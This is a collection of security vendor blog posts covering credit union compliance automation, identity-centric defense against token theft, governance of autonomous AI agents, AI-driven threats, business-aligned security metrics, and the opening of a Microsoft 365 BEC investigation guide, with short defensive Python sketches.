

Today, I just wanted to remind folks about the capabilities and use cases for HoneyPoint Security Server™. Got questions? Just ping us at info@microsolved.com.

As credit unions navigate an increasingly complex regulatory landscape in 2026—balancing cybersecurity mandates, fair lending requirements, and evolving privacy laws—the case for modern, automated compliance operations has never been stronger. Yet many small and mid-sized credit unions still rely heavily on manual workflows, spreadsheets, and after-the-fact audits to stay within regulatory bounds.

To meet these challenges with limited resources, it’s time to rethink how compliance is operationalized—not just documented. And one surprising source of inspiration comes from a system many credit unions already touch: e‑OSCAR.

The e‑OSCAR platform revolutionized how credit reporting disputes are processed—automating a once-manual, error-prone task with standardized electronic workflows, centralized audit logs, and automated evidence generation. That same principle—automating repeatable, rule-driven compliance actions and connecting systems through a unified, traceable framework—can and should be applied to broader compliance areas.

An “OSCAR-style” approach means moving from fragmented checklists to automated, event-driven compliance workflows, where policy triggers launch processes without human lag or ambiguity. It also means tighter integration across systems, real-time monitoring of risks, and ready-to-go audit evidence built into daily operations.

For credit unions, 2026 brings a convergence of pressures:

New AI and automated decision-making laws (especially at the state level) require detailed documentation of how member data and lending decisions are handled.

BSA/AML enforcement is tightening, with regulators demanding faster responses and proactive alerts.

NCUA is signaling closer cyber compliance alignment with FFIEC’s CAT and other maturity models, especially in light of public-sector ransomware trends.

Exam cycles are accelerating, and “show your work” now means “prove your controls with logs and process automation.”

Small teams can’t keep up with these expectations using legacy methods. The answer isn’t hiring more staff—it’s changing the model.

Event-Driven Automation

Triggers like a new member onboarding, a flagged transaction, or a regulatory update initiate prebuilt compliance workflows—notifications, actions, escalations—automatically.

Standardized, Machine-Readable Workflows

Compliance obligations (e.g., Reg E, BSA alerts, annual disclosures) are encoded as reusable processes—not tribal knowledge.

Connected Systems & Data Flows

APIs and batch exchanges tie together core banking, compliance, cybersecurity, and reporting systems—just like e‑OSCAR connects furnishers and bureaus.

Real-Time Risk Detection

Anomalies and policy deviations are detected automatically and trigger workflows before they become audit findings.

Automated Evidence & Audit Trails

Every action taken is logged and time-stamped, ready for examiners, with zero manual folder-building.
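As a rough illustration of the event-driven pattern and built-in audit trail described above, here is a minimal Python sketch. The event names, step names, and the `WORKFLOWS` table are hypothetical placeholders, not part of e‑OSCAR or any particular GRC product.

```python
from datetime import datetime, timezone

# Hypothetical mapping of trigger events to ordered workflow steps.
WORKFLOWS = {
    "new_member_onboarded": ["run_cip_check", "send_disclosures"],
    "transaction_flagged": ["open_bsa_case", "notify_compliance_officer"],
}

audit_log = []  # stand-in for append-only evidence storage


def handle_event(event_type, subject_id):
    """Launch the workflow for an event and log each step as evidence."""
    steps = WORKFLOWS.get(event_type, [])
    for step in steps:
        audit_log.append({
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "event": event_type,
            "subject": subject_id,
            "step": step,
        })
    return steps


handle_event("transaction_flagged", "txn-1001")
```

The point of the design is that the evidence is a by-product of running the workflow, so nobody has to assemble it later for an examiner.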

1. Begin with Your Pain Points

Where are you most at risk? Where do tasks fall through the cracks? Focus on high-volume, highly regulated areas like BSA/AML, disclosures, or cybersecurity incident reporting.

2. Inventory Obligations and Map to Triggers

Define the events that should launch compliance workflows—new accounts, flagged alerts, regulatory updates.

3. Pilot Automation Tools

Leverage low-code workflow engines or credit-union-friendly GRC platforms. Ensure they allow for API integration, audit logging, and dashboard oversight.

4. Shift from “Tracking” to “Triggering”

Replace compliance checklists with rule-based workflows. Instead of “Did we file the SAR?” it’s “Did the flagged transaction automatically escalate into SAR review with evidence attached?”
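To make the "triggering" idea concrete, here is a hedged sketch of a flagged transaction escalating into a SAR review case with evidence attached at creation time. The `SarReviewCase` class and the transaction fields are assumptions made up for illustration, not a real core-banking or BSA system schema.

```python
from dataclasses import dataclass, field


@dataclass
class SarReviewCase:
    transaction_id: str
    reason: str
    evidence: list = field(default_factory=list)
    status: str = "pending_review"


def escalate_flagged_transaction(txn):
    """Create a SAR review case from a flagged transaction, with evidence attached."""
    if not txn.get("flagged"):
        return None
    case = SarReviewCase(transaction_id=txn["id"], reason=txn["flag_reason"])
    # Capture what a reviewer would ask for at the moment of escalation.
    case.evidence.append({"type": "transaction_snapshot", "data": dict(txn)})
    return case


case = escalate_flagged_transaction(
    {"id": "txn-42", "amount": 9800, "flagged": True, "flag_reason": "structuring pattern"}
)
```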

Implementing an OSCAR-inspired compliance framework may sound complex—but you don’t have to go it alone. Whether you’re starting from a blank slate or evolving an existing compliance program, the right partner can accelerate your progress and reduce risk.

MicroSolved, Inc. has deep experience supporting credit unions through every phase of cybersecurity and compliance transformation. Through our Consulting & vCISO (Virtual Chief Information Security Officer) program, we provide tailored, hands-on guidance to help:

Assess current compliance operations and identify automation opportunities

Build strategic roadmaps and implementation blueprints

Select and integrate tools that match your budget and security posture

Establish automated workflows, triggers, and audit systems

Train your team on long-term governance and resilience

Whether you’re responding to new regulatory pressure or simply aiming to do more with less, our team helps you operationalize compliance without overloading staff or compromising control.

📩 Ready to start your 2026 planning with expert support?

Visit www.microsolved.com or contact us directly at info@microsolved.com to schedule a no-obligation strategy call.

* AI tools were used as a research assistant for this content, but human moderation and writing are also included. The included images are AI-generated.

In 2025, identity is no longer simply a control at the edge of your network — it is the perimeter. As organizations adopt SaaS‑first strategies, hybrid work, remote access, and cloud identity federation, the traditional notion of network perimeter has collapsed. What remains is the identity layer — and attackers know it.

Today’s breaches often don’t involve malware, brute‑force password cracking, or noisy exploits. Instead, adversaries leverage stolen tokens, hijacked sessions, and compromised identity‑provider (IdP) infrastructure — all while appearing as legitimate users.

That shift makes identity security not just another checkbox — but the foundation of enterprise defense.

Even organizations that have deployed defenses like multi‑factor authentication (MFA), single sign‑on (SSO), and conditional access policies often remain vulnerable. Why? Because many identity architectures are:

Overly permissive — long‑lived tokens, excessive scopes, and flat permissioning.

Fragmented — identity data is scattered across IdPs, directories, cloud apps, and shadow IT.

Blind to session risk — session tokens are often unmonitored, allowing token theft and session hijacking to go unnoticed.

Incompatible with modern infrastructure — legacy IAMs often can’t handle dynamic, cloud-native, or hybrid environments.

In short: you can check off MFA, SSO, and PAM, and still be wide open to identity‑based compromise.

Consider this realistic scenario:

An employee logs in using SSO. The browser receives a token (OAuth or session cookie).

A phishing attack — or adversary-in-the-middle (AiTM) — captures that token after the user completes MFA.

The attacker imports the token into their browser and now impersonates the user — bypassing MFA.

The attacker explores internal SaaS tools, installs backdoor OAuth apps, and escalates privileges — all without tripping alarms.

A single stolen token can unlock everything.
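One hedged way to spot the replay step in the scenario above is to watch for the same token appearing from more than one client fingerprint. The sketch below assumes session events with hypothetical `token_id`, `ip`, and `user_agent` fields. Real users do change networks, so treat a hit as a signal to investigate rather than proof of theft.

```python
def detect_token_replay(events):
    """Return token IDs seen from more than one client fingerprint.

    Each event is a dict with hypothetical keys: token_id, ip, user_agent.
    """
    first_seen = {}
    suspicious = set()
    for e in events:
        fingerprint = (e["ip"], e["user_agent"])
        original = first_seen.setdefault(e["token_id"], fingerprint)
        if original != fingerprint:
            suspicious.add(e["token_id"])
    return suspicious


events = [
    {"token_id": "tok-a", "ip": "203.0.113.10", "user_agent": "Chrome/Windows"},
    {"token_id": "tok-a", "ip": "198.51.100.7", "user_agent": "Firefox/Linux"},
    {"token_id": "tok-b", "ip": "203.0.113.11", "user_agent": "Safari/macOS"},
]
replayed = detect_token_replay(events)
```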

The modern identity stack must be redesigned around the realities of today’s attacks:

Identity is the perimeter — access should flow through hardened, monitored, and policy-enforced IdPs.

Session analytics is a must — don’t just authenticate at login. Monitor behavior continuously throughout the session.

Token lifecycle control — enforce short token lifetimes, minimize scopes, and revoke unused sessions immediately.

Unify the view — consolidate visibility across all human and machine identities, across SaaS and cloud.
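Token lifecycle control can be sketched as a simple policy check. The limits below (a one-hour lifetime and a 15-minute idle timeout) and the token record fields are assumptions chosen for illustration. Your IdP will have its own settings and revocation API.

```python
from datetime import datetime, timedelta, timezone

MAX_LIFETIME = timedelta(hours=1)   # assumed policy: short-lived tokens
MAX_IDLE = timedelta(minutes=15)    # assumed policy: revoke idle sessions


def tokens_to_revoke(tokens, now):
    """Return IDs of tokens that exceed the lifetime or idle limits."""
    revoke = []
    for t in tokens:
        too_old = now - t["issued_at"] > MAX_LIFETIME
        idle = now - t["last_used_at"] > MAX_IDLE
        if too_old or idle:
            revoke.append(t["id"])
    return revoke


now = datetime(2025, 1, 1, 12, 0, tzinfo=timezone.utc)
tokens = [
    {"id": "t1", "issued_at": now - timedelta(minutes=10), "last_used_at": now - timedelta(minutes=1)},
    {"id": "t2", "issued_at": now - timedelta(hours=3), "last_used_at": now - timedelta(minutes=2)},
    {"id": "t3", "issued_at": now - timedelta(minutes=40), "last_used_at": now - timedelta(minutes=30)},
]
stale = tokens_to_revoke(tokens, now)
```

Here `t2` is flagged for age and `t3` for inactivity, while `t1` stays valid.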

For SaaS-heavy and hybrid-cloud organizations, these practices are key:

Use a secure, enterprise-grade IdP

Implement phishing-resistant MFA (e.g., hardware keys, passkeys)

Enforce context-aware access policies

Monitor and analyze every identity session in real time

Treat machine identities as equal in risk and value to human users

Use systems thinking to model identity as an interconnected ecosystem:

Pareto principle: a small share of misconfigurations (the classic 20%) tends to account for most (roughly 80%) of breaches.

Inversion — map how you would attack your identity infrastructure.

Compounding — small permissions or weak tokens can escalate rapidly.

Core practices:

Short-lived tokens and ephemeral access

Just-in-time and least privilege permissions

Session monitoring and token revocation pipelines

OAuth and SSO app inventory and control

Unified identity visibility across environments

| Day | Action |
|---|---|
| 1–3 | Inventory all identities: human, machine, and service. |
| 4–7 | Harden your IdP; audit key management. |
| 8–14 | Enforce phishing-resistant MFA organization-wide. |
| 15–18 | Apply risk-based access policies. |
| 19–22 | Revoke stale or long-lived tokens. |
| 23–26 | Deploy session monitoring and anomaly detection. |
| 27–30 | Audit and rationalize privileges and unused accounts. |

If you’re unsure where to start, ask these questions:

How many active OAuth grants are in our environment?

Are we monitoring session behavior after login?

When was the last identity privilege audit performed?

Can we detect token theft in real time?

If any of those are difficult to answer — you’re not alone. Most organizations aren’t architected to handle identity as the new perimeter. But the gap between today’s risks and tomorrow’s solutions is closing fast — and the time to address it is now.

At MicroSolved, Inc., we’ve helped organizations evolve their identity security models for more than 30 years. Our experts can:

Audit your current identity architecture and token hygiene

Map identity-related escalation paths

Deploy behavioral identity monitoring and continuous session analytics

Coach your team on modern IAM design principles

Build a 90-day roadmap for secure, unified identity operations

Let’s work together to harden identity before it becomes your organization’s softest target. Contact us at microsolved.com to start your identity security assessment.

Over the last year, we’ve watched autonomous AI agents — not the chatbots everyone experimented with in 2023, but actual agentic systems capable of chaining tasks, managing workflows, and making decisions without a human in the loop — move from experimental toys into enterprise production. Quietly, and often without much governance, they’re being wired into pipelines, automation stacks, customer-facing systems, and even security operations.

And we’re treating them like they’re just another tool.

They’re not.

These systems represent a new class of non-human identity: entities that act with intent, hold credentials, make requests, trigger processes, and influence outcomes in ways we previously only associated with humans or tightly-scoped service accounts. But unlike a cron job or a daemon, today’s AI agents are capable of learning, improvising, escalating tasks, and — in some cases — creating new agents on their own.

That means our security model, which is still overwhelmingly human-centric, is about to be stress-tested in a very real way.

Let’s unpack what that means for organizations.

Historically, enterprises have understood identity in human terms: employees, contractors, customers. Then we added service accounts, bots, workloads, and machine identities. Each expansion required a shift in thinking.

Agentic AI forces the next shift.

These systems:

Authenticate to APIs and services

Consume and produce sensitive data

Modify cloud or on-prem environments

Take autonomous action based on internal logic or model inference

Operate 24/7 without oversight

If that doesn’t describe an “identity,” nothing does.

But unlike service accounts, agentic systems have:

Adaptive autonomy – they make novel decisions, not just predictable ones

Stateful memory – they remember and leverage data over time

Dynamic scope – their “job description” can expand as they chain tasks

Creation abilities – some agents can spawn additional agents or processes

This creates an identity that behaves more like an intern with root access than a script with scoped permissions.

That’s where the trouble starts.

Most organizations don’t yet have guardrails for agentic behavior. When these systems fail — or are manipulated — the impacts can be immediate and severe.

Agents often need API keys, tokens, or delegated access.

Developers tend to over-provision them “just to get things working,” and suddenly you’ve got a non-human identity with enough privilege to move laterally or access sensitive datasets.
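A quick way to surface over-provisioning is to compare what an agent was granted with what it has actually used. This is only a sketch: the scope names are invented, and in practice the "used" list would come from your API gateway or audit logs.

```python
def unused_scopes(granted, used):
    """Return scopes that were granted but never exercised, sorted for stable output."""
    return sorted(set(granted) - set(used))


granted = ["repo:read", "repo:write", "secrets:read", "deploy:prod"]
used = ["repo:read", "repo:write"]
excess = unused_scopes(granted, used)
```

Anything left in `excess` is a candidate for removal, or at least a conversation with the agent's owner.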

Many agents interact with third-party models or hosted pipelines.

If prompts or context windows inadvertently contain sensitive data, that information can be exposed, logged externally, or retained in ways the enterprise can’t control.

We’ve already seen teams quietly spin up ChatGPT agents, GitHub Copilot agents, workflow bots, or LangChain automations.

In 2025, shadow IT has a new frontier:

Shadow agents — autonomous systems no one approved, no one monitors, and no one even knows exist.

Agents pulling from package repositories or external APIs can be tricked into consuming malicious components. Worse, an autonomous agent that “helpfully” recommends or installs updates can unintentionally introduce compromised dependencies.

While “rogue AI” sounds sci-fi, in practice it looks like:

An agent looping transactions

Creating new processes to complete a misinterpreted task

Auto-retrying in ways that amplify an error

Overwriting human input because the policy didn’t explicitly forbid it

Think of it as automation behaving badly — only faster, more creatively, and at scale.

Organizations need a structured approach to securing autonomous agents. Here’s a practical baseline:

Treat agents as first-class citizens in your IAM strategy:

Unique identities

Managed lifecycle

Documented ownership

Distinct authentication mechanisms

Least privilege isn’t optional — it’s survival.

And it must be dynamic, since agents can change tasks rapidly.

Every agent action must be:

Traceable

Logged

Attributable

Otherwise incident response becomes guesswork.
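As a minimal sketch of what "traceable, logged, attributable" can look like in practice, the function below emits one structured log line per agent action. The field names and example values are assumptions, not a standard schema.

```python
import json
from datetime import datetime, timezone


def audit_record(agent_id, owner, action, target, request_id):
    """Build one structured log line tying an action to an agent and its owner."""
    return json.dumps({
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "agent_id": agent_id,      # attributable: which agent acted
        "owner": owner,            # attributable: who is accountable for it
        "action": action,          # logged: what it did
        "target": target,
        "request_id": request_id,  # traceable: correlates the steps of one task
    }, sort_keys=True)


line = audit_record("agent-billing-01", "finance-ops", "read", "reports/q3.csv", "req-7f3a")
```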

Separate agents by:

Sensitivity of operations

Data domains

Functional responsibilities

An agent that reads sales reports shouldn’t also modify Kubernetes manifests.

Agents don’t sleep.

Your monitoring can’t either.

Watch for:

Unexpected behaviors

Novel API call patterns

Rapid-fire task creation

Changes to permissions

Self-modifying workflows
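Rapid-fire task creation is one of the easier signals to check mechanically. Here is a hedged sketch using a sliding time window. The `RateWatch` class and its thresholds are hypothetical, and real limits would need tuning per agent.

```python
from collections import deque


class RateWatch:
    """Flag an agent that creates more than `limit` tasks within `window` seconds."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self.times = deque()

    def record(self, ts):
        """Record a task creation at time `ts` (seconds); return True if over the limit."""
        self.times.append(ts)
        # Drop timestamps that have aged out of the window.
        while self.times and ts - self.times[0] > self.window:
            self.times.popleft()
        return len(self.times) > self.limit


watch = RateWatch(limit=3, window=10)
alerts = [watch.record(t) for t in [0, 1, 2, 3, 20]]
```

The fourth task within ten seconds trips the alert, and the later task at `t=20` does not, because the earlier ones have aged out.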

Every agent must have a:

Disable flag

Credential revocation mechanism

Circuit breaker for runaway execution

If you can’t stop it instantly, you don’t control it.
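A disable flag and a circuit breaker can be very small pieces of code. The sketch below is an illustration under assumed names (`AgentCircuitBreaker`, `max_actions`), not a reference to any agent framework. Credential revocation would still have to happen in your IdP or secrets manager.

```python
class AgentCircuitBreaker:
    """Stop an agent when it is disabled or exceeds an action budget."""

    def __init__(self, max_actions):
        self.max_actions = max_actions
        self.count = 0
        self.disabled = False  # the "disable flag"

    def allow(self):
        """Return True if the agent may take another action."""
        if self.disabled:
            return False
        self.count += 1
        if self.count > self.max_actions:
            self.disabled = True  # trip the breaker; stays off until a human resets it
            return False
        return True


breaker = AgentCircuitBreaker(max_actions=2)
results = [breaker.allow() for _ in range(4)]
```

Setting `breaker.disabled = True` by hand acts as the manual kill switch, and the action budget catches runaway loops automatically.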

Define:

Approval processes for new agents

Documentation expectations

Testing and sandboxing requirements

Security validation prior to deployment

Governance is what prevents “developer convenience” from becoming “enterprise catastrophe.”

This is one of the emerging fault lines inside organizations. Agentic AI crosses traditional silos:

Dev teams build them

Ops teams run them

Security teams are expected to secure them

Compliance teams have no framework to govern them

The most successful organizations will assign ownership to a cross-functional group — a hybrid of DevSecOps, architecture, and governance.

Someone must be accountable for every agent’s creation, operation, and retirement.

Otherwise, you’ll have a thousand autonomous processes wandering around your enterprise by 2026, and you’ll only know about a few dozen of them.

Inventory existing agents (you have more than you think).

Assign identity profiles and owners.

Implement basic least-privilege controls.

Create kill-switches for all agents in production.

Formalize agent governance processes.

Build centralized logging and monitoring.

Standardize onboarding/offboarding workflows for agents.

Assess all AI-related supply-chain dependencies.

Integrate agentic security into enterprise IAM.

Establish continuous red-team testing for agentic behavior.

Harden infrastructure for autonomous decision-making systems.

Prepare for regulatory obligations around non-human identities.

Agentic AI is not a fad — it’s a structural shift in how automation works.

Enterprises that prepare now will weather the change. Those that don’t will be chasing agents they never knew existed.

If your organization is beginning to deploy AI agents — or if you suspect shadow agents are already proliferating inside your environment — now is the time to get ahead of the risk.

MicroSolved can help.

From enterprise AI governance to agentic threat modeling, identity management, and red-team evaluations of AI-driven workflows, MSI is already working with organizations to secure autonomous systems before they become tomorrow’s incident reports.

For more information or to talk through your environment, reach out to MicroSolved.

We’re here to help you build a safer, more resilient future.

The cyber-threat landscape is shifting under our feet. Attacker tools powered by artificial intelligence (AI) and generative AI (Gen AI) are accelerating vulnerability discovery and exploitation, outpacing many traditional defence approaches. Organisations that delay adaptation risk being overtaken by adversaries. According to recent reporting, nearly half of organisations identify adversarial Gen AI advances as a top concern. In this post, I walk through the current threat landscape, spotlight key attack vectors, explore defensive options, examine critical gaps, and propose a roadmap that security leaders should adopt now.

Attackers now exploit a converging set of forces: an increasing rate of disclosed vulnerabilities, the wide availability of AI/ML-based tools for crafting attacks, and automation that scales old-school tactics into far greater volume. One report notes 16% of reported incidents involved attackers leveraging AI tools like language or image generation models. Meanwhile, researchers warn that AI-generated threats could make up to 50% of all malware by 2025. Gen AI is now a game-changer for both attackers and defenders.

The sheer pace of vulnerability disclosure also matters. The more pathways available, the more damage automation and AI can do. Gen AI will be the top driver of cybersecurity in 2024 and beyond, for malicious actors and defenders alike.

The baseline for attackers is being elevated. The attacker toolkit is becoming smarter, faster and more scalable. Defenders must keep up — or fall behind.

Realistic voice- and video-based deepfakes are no longer novel. They are entering the mainstream of social engineering campaigns. Gen AI enables image and language generation that significantly boosts attacker credibility.

Attackers use Gen AI tools to generate personalised, plausible phishing lures and malicious payloads. LLMs make phishing scalable and more effective, turning what used to take hours into seconds.

Third-party AI or ML services introduce new risks—prompt-injection, insecure model APIs, and adversarial data manipulation are all growing threats.

AI now drives polymorphic malware capable of real-time mutation, evading traditional static defences. Reports cite that over 75% of phishing campaigns now include this evasion technique.

Defenders are deploying AI for behaviour analytics, anomaly detection, and real-time incident response. Some AI systems now exceed 98% detection rates in high-risk environments.

Networks, endpoints, cloud workloads, and AI interactions must be continuously monitored. Automation enables rapid response at machine speed.

Threat intelligence platforms enhance proactive defence by integrating real-time adversary TTPs into detection engines and response workflows.

Crowdsourcing vulnerability detection helps organisations close exposure gaps before adversaries exploit them.

Many organisations still cannot respond at Gen AI speed.

Defensive postures are often reactive.

Legacy tools are untested against polymorphic or AI-powered threats.

Severe skills shortages in AI/cybersecurity crossover roles.

Data for training defensive models is often biased or incomplete.

Lack of governance around AI model usage and security.

Pilot AI/Automation – Start with small, measurable use cases.

Integrate Threat Intelligence – Especially AI-specific adversary techniques.

Model AI/Gen AI Threats – Include prompt injection, model misuse, identity spoofing.

Continuous Improvement – Track detection, response, and incident metrics.

Governance & Skills – Establish AI policy frameworks and upskill the team.

Resilience Planning – Simulate AI-enabled threats to stress-test defences.

Time to detect (TTD)

Number of AI/Gen AI-involved incidents

Mean time to respond (MTTR)

Alert automation ratio

Dwell time reduction
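Two of these metrics are simple to compute once incident timestamps are recorded consistently. The sketch below uses made-up incident records and measures response time from detection to resolution. Definitions vary between teams, so treat that choice as an assumption.

```python
from datetime import datetime
from statistics import mean

# Hypothetical incident records: when each incident began, was detected, and was resolved.
incidents = [
    {"start": datetime(2025, 3, 1, 8, 0), "detected": datetime(2025, 3, 1, 10, 0),
     "resolved": datetime(2025, 3, 1, 16, 0)},
    {"start": datetime(2025, 3, 5, 9, 0), "detected": datetime(2025, 3, 5, 13, 0),
     "resolved": datetime(2025, 3, 5, 15, 0)},
]


def hours(delta):
    """Convert a timedelta to hours."""
    return delta.total_seconds() / 3600


mean_ttd = mean(hours(i["detected"] - i["start"]) for i in incidents)
mttr = mean(hours(i["resolved"] - i["detected"]) for i in incidents)
```

For these sample records the mean time to detect is 3 hours and the mean time to respond is 4 hours.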

The cyber-arms race has entered a new era. AI and Gen AI are force multipliers for attackers. But they can also become our most powerful tools—if we invest now. Legacy security models won’t hold the line. Success demands intelligence-driven, AI-enabled, automation-powered defence built on governance and metrics.

The time to adapt isn’t next year. It’s now.

At MicroSolved, Inc., we help organisations get ahead of emerging threats—especially those involving Gen AI and attacker automation. Our capabilities include:

AI/ML security architecture review and optimisation

Threat intelligence integration

Automated incident response solutions

AI supply chain threat modelling

Gen AI table-top simulations (e.g., deepfake, polymorphic malware)

Security performance metrics and strategy advisory

Contact Us:

🌐 microsolved.com

📧 info@microsolved.com

📞 +1 (614) 423‑8523

IBM Cybersecurity Predictions for 2025

Mayer Brown, 2025 Cyber Incident Trends

WEF Global Cybersecurity Outlook 2025

CyberMagazine, Gen AI Tops 2025 Trends

Gartner Cybersecurity Trends 2025

Syracuse University iSchool, AI in Cybersecurity

DeepStrike, Surviving AI Cybersecurity Threats

SentinelOne, Cybersecurity Statistics 2025

Ahi et al., LLM Risks & Roadmaps, arXiv 2506.12088

Lupinacci et al., Agent-based AI Attacks, arXiv 2507.06850

Wikipedia, Prompt Injection

Security teams around the world face a persistent challenge: articulating the value of cybersecurity in business terms—and thereby justifying budget and ROI. Too often the story falls into the “we reduced vulnerabilities” or “we blocked attacks” bucket, which resonates with the technical team—but not with the board, the CFO, or the business units. The result: under‑investment or misalignment of security with business goals.

In an era of tighter budgets and competing priorities, this gap has become urgent. Framing cybersecurity as a cost centre invites cuts; framing it as a business enabler invites investment.

When security operates in a silo, focused purely on threats, alerts, and tools, the conversation stays technical. But business leaders speak a different language: revenue, growth, brand, customer trust. A recent analysis found that fewer than half of security organisations can tie controls to business impacts.

Misalignment leads to several risks:

Security investments that don’t map to the assets or processes that drive business value.

Metrics that matter to the security team but not to executives (e.g., number of vulnerabilities patched).

A perception of security as an overhead rather than a strategic lever.

Vulnerability to budget cuts or being deprioritised when executive attention shifts.

By aligning security with business objectives—whether that’s enabling cloud transformation, protecting key revenue streams, or ensuring operational continuity—security becomes part of the value chain, not just the defence chain.

One of the central tasks for today’s security leader is translation. It’s not enough to know that a breach could occur; the leader must be able to say, “If this happens, here’s what it will cost the business.”

Determine the business value at risk: downtime, lost revenue, brand damage, regulatory fines.

Use financial terms whenever possible. For example: “A two‑week outage in our payments system could cost us $X in lost transactions, plus $Y in remediation, plus $Z in churn.”

Link initiatives to business outcomes: for example, “By reducing mean time to recover (MTTR) we reduce revenue downtime by N hours” rather than “we improved MTTR by X%.”

Employ frameworks such as the Gordon–Loeb model, which estimates an optimal level of security investment relative to expected loss (though it depends on assumptions about breach probability and loss size).

Recognise that not all value is in avoided loss; some lies in enabling business growth, winning deals because you have credible security, or supporting new business models.
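To show how the translation steps above turn into numbers, here is a hedged sketch. It sums the three cost components from the payments-outage example, then applies the commonly cited Gordon–Loeb result that optimal security spend generally should not exceed 1/e (about 37%) of the expected loss. All figures are illustrative, and the bound holds only under the model's assumptions.

```python
import math


def outage_cost(lost_transactions, remediation, churn):
    """Sum the three cost components from the payments-outage example ($X + $Y + $Z)."""
    return lost_transactions + remediation + churn


def gordon_loeb_ceiling(breach_probability, potential_loss):
    """Upper bound on security spend under Gordon-Loeb: (1/e) x expected loss."""
    expected_loss = breach_probability * potential_loss
    return expected_loss / math.e


# Illustrative figures only; none of these come from a real engagement.
total = outage_cost(lost_transactions=400_000, remediation=150_000, churn=250_000)
ceiling = gordon_loeb_ceiling(breach_probability=0.10, potential_loss=total)
```

With these sample inputs the outage would cost $800,000, and the model suggests a spending ceiling a little under $30,000 to address that specific risk.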

A recurring complaint: security dashboards measure what’s easy, not what’s meaningful. For example, counting “number of alerts” or “vulnerabilities remediated” is fine—but it doesn’t always tie to business risk.

More business‑centric metrics include:

Cost of breach avoided (or estimated)

Time to revenue recovery after an incident

Customer churn attributable to a security incident

Brand impact or contract losses following a breach or non‑compliance

Percentage of revenue protected by controls

Time to market or new product enabled because security risk was managed

Dashboards should present these in the language executives expect: dollars, days, revenue impact, strategic enablement. Security leaders who are business‑aligned reportedly are eight times more likely to be confident in reporting their organisation’s state of risk.

To bridge the gap between security activity and business outcome, various frameworks and approaches help:

Use‑case based strategy: Define concrete security use‑cases (e.g., “we protect the digital sales channel from disruption”) and link them directly to business functions.

Enterprise architecture alignment: Map security controls into business processes, so protection of critical business services is visible.

Risk‑based approach: Rather than “patch everything,” focus on the assets and threats that, if realised, would damage business.

Governance and stakeholder structure: Organisations with a security‑business interface (e.g., a BISO) tend to align better.

Metric derivation methodologies: Academic work (e.g., the GQM‑based methodology) shows how to trace business goals to security metrics in context.

Communication is where many security programmes stumble. Here are key pointers:

Speak business language: Avoid security jargon; translate into risk reduction, revenue protection, competitive advantage.

Use stories + numbers: A well‑chosen anecdote (“What would happen if our customer billing system went down?”) combined with financial impact earns attention.

Show progress and lead‑lag metrics: Not just “we did X,” but “here’s what that means for business today and tomorrow.”

Link to business drivers: Highlight how security supports strategic initiatives (digital transformation, customer trust, brand, M&A).

Frame security as an enabler: “Our investment in security enables us to go to market faster with product Y” rather than “we need money to buy product Z.”

Prepare for the uncomfortable: Be ready to answer “How secure are we?” with confidence, backed by data.

Here is a practical sequence for moving from alignment theory to execution:

Audit your current metrics

• Catalogue all current security metrics (technical, operational) and gauge how many map to business outcomes.

• Identify which metrics executives care about (revenue, brand, competitive risk).

Engage business stakeholders

• Identify key business functions and owners (CIO, CFO, business units) and ask: what keeps you up at night? What business processes are critical?

• Jointly map which assets/processes support those business functions, and the security risks associated.

Link security programmes to business outcomes

• For each major initiative, define the business outcome it supports, the risk it mitigates, and the metric you’ll use to show progress.

• Prioritise initiatives that support high‑value business functions or high‑risk scenarios.

Build business‑centric dashboards

• Create a dashboard for executives/board that shows metrics like “% of revenue protected”, “estimated downtime cost if outage X occurs”, “time to recovery”.

• Supplement with strategic commentary (what’s changing, what decisions are required).

Embed continuous feedback and iteration

• Periodically (quarterly or more) revisit alignment: Are business priorities shifting? Are new threats emerging?

• Adjust metrics and initiatives accordingly to maintain alignment.

Communicate outcomes, not just activity

• Present progress in business terms: “Because of our work we reduced our estimated exposure by $X over Y months,” or “We enabled the rollout of product Z with acceptable risk and no delay.”

• Use these facts to support budget discussions, not just ask for funds.

In today’s constrained environment, simply having a solid firewall or endpoint solution isn’t enough. For security to earn its seat at the table, it must speak the language of business: risk, cost, revenue, growth.

When security teams shift from being defenders of the perimeter to enablers of the enterprise, they unlock greater trust, stronger budgets, and a role that transcends compliance.

If you’re leading a security function today, ask yourself: “When the CFO asks what we achieved last quarter, can I answer in dollars and days, or just number of patches and alerts?” The answer will determine whether you’re seen as a cost centre—or a strategic partner.

If your organization is struggling to align cybersecurity initiatives with business objectives—or if you need to translate risk into financial impact—MicroSolved, Inc. can help.

For over 30 years, we’ve worked with CISOs, risk teams, boards, and executive leadership to:

Design and implement risk-centric, business-aligned cybersecurity strategies

Develop security KPIs and dashboards that communicate effectively at the executive level

Assess existing security programs for gaps in business alignment and ROI

Provide CISO-as-a-Service engagements that focus on strategic enablement, not just compliance

Facilitate security-business stakeholder engagement sessions to unify priorities

Whether you need a workshop, a second opinion, or a comprehensive security-business alignment initiative, we’re ready to partner with you.

To start a conversation, contact us at:

📧 info@microsolved.com

🌐 https://www.microsolved.com

📞 +1-614-351-1237

Let’s move security from overhead to overachiever—together.

Global Cyber Alliance. “Facing the Challenge: Aligning Cybersecurity and Business.” https://gca.isa.org

Transformative CIO. “Cybersecurity ROI: How to Align Protection and Performance.” https://transformative.cio.com

CDG. “How to Build and Justify Your Cybersecurity Budget.” https://www.cdg.io

Wikipedia. “Gordon–Loeb Model.” https://en.wikipedia.org/wiki/Gordon–Loeb_model

Impact. “Maximizing ROI Through Cybersecurity Strategy.” https://www.impactmybiz.com

SecurityScorecard. “How to Justify Your Cybersecurity Budget.” https://securityscorecard.com

PwC. “Elevating Business Alignment in Cybersecurity Strategies.” https://www.pwc.com

Rivial Security. “Maximizing ROI With a Risk-Based Cybersecurity Program.” https://www.rivialsecurity.com

Arxiv. “Deriving Cybersecurity Metrics From Business Goals.” https://arxiv.org/abs/1910.05263

TechTarget. “Cybersecurity Budget Justification: A Guide for CISOs.” https://www.techtarget.com

* AI tools were used as a research assistant for this content, but human moderation and writing are also included. The included images are AI-generated.

When your organization faces a business-email compromise (BEC) incident, one of the hardest questions is: “What did the attacker actually read or export?” Conventional logs often show only sign-ins or outbound sends, but not the depth of mailbox item access. The MailItemsAccessed audit event in Microsoft 365 Unified Audit Log (UAL) brings far more visibility — if configured correctly. This article outlines a repeatable, defensible process for investigation using that event, from readiness verification to scoping and reporting.

Provide a repeatable, defensible process to identify, scope, and validate email exposure in BEC investigations using the MailItemsAccessed audit event.

Before an incident hits, you must validate your logging and audit posture. These steps ensure you’ll have usable data.

Verify your tenant’s audit plan under Microsoft Purview Audit (Standard or Premium).

